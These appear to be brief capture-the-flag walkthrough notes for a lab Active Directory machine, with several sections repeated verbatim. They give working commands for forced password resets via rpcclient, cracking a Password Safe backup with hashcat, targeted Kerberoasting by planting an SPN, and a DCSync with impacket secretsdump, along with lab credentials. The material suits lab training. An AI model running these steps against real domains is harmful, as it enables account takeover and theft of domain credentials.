Foothold
1. enum4linux -u olivia -p ichliebedich -a 10.129.178.110
2. see that benjamin is part of Share Moderatorslocal group
3. olivia is part of Remote Management Users
4. winrm into the machine
5. bloodhound
6. ethan can dcsync the DC
7. emily has generic write on ethan
8. olivia has generic write on michael
9. change password for michael and login as michael
10. michael has can force benjamin to change password
11. use rpcclient as michael
12. setuserinfo2 benjamin 23 password123!
13. FTP as benjamin to download Backup.psafe3
14. hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt (tekieromucho)
15. use passwordsafe to open up Backup.psafe3 to get emily’s password
1. enum4linux -u olivia -p ichliebedich -a 10.129.178.110
2. see that benjamin is part of Share Moderatorslocal group
3. olivia is part of Remote Management Users
4. winrm into the machine
5. bloodhound
6. ethan can dcsync the DC
7. emily has generic write on ethan
8. olivia has generic write on michael
9. change password for michael and login as michael
10. michael has can force benjamin to change password
11. use rpcclient as michael
12. setuserinfo2 benjamin 23 password123!
13. FTP as benjamin to download Backup.psafe3
14. hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt (tekieromucho)
15. use passwordsafe to open up Backup.psafe3 to get emily’s password
PrivEsc
1. Change password of ethan
2. Write an SPN to ethan
$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)
Set-DomainObject -Credential $Cred -Identity administrator.htb\ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainSPNTicket -Credential $Cred administrator.htb\ethan | fl
3. Kerberoast ethan based on this newly created SPN
impacket-GetUserSPNs -dc-ip 10.129.178.110 -request -outputfile kerberos administrator.htb/olivia
4. crack the hash (limpbizkit)
5. dc-sync to get admin hash
impacket-secretsdump administrator.htb/ethan:"limpbizkit"@10.129.178.110
6. login as root
2. Write an SPN to ethan
$SecPassword = ConvertTo-SecureString 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\emily', $SecPassword)
Set-DomainObject -Credential $Cred -Identity administrator.htb\ethan -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainSPNTicket -Credential $Cred administrator.htb\ethan | fl
3. Kerberoast ethan based on this newly created SPN
impacket-GetUserSPNs -dc-ip 10.129.178.110 -request -outputfile kerberos administrator.htb/olivia
4. crack the hash (limpbizkit)
5. dc-sync to get admin hash
impacket-secretsdump administrator.htb/ethan:"limpbizkit"@10.129.178.110
6. login as root